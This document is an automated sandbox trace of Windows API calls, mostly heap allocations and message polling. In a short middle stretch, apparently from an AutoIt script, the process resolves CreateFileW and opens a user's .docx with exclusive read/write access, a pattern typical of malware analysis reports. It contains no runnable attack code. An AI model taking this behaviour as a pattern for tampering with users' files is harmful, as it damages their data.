0 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0170.996] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0170.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0170.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.022] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.022] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0171.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.022] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0171.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bda98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0171.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j0tjz4pqz2gw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0171.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0171.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa77820 | out: hHeap=0x8a0000) returned 1 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.028] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.030] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.031] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 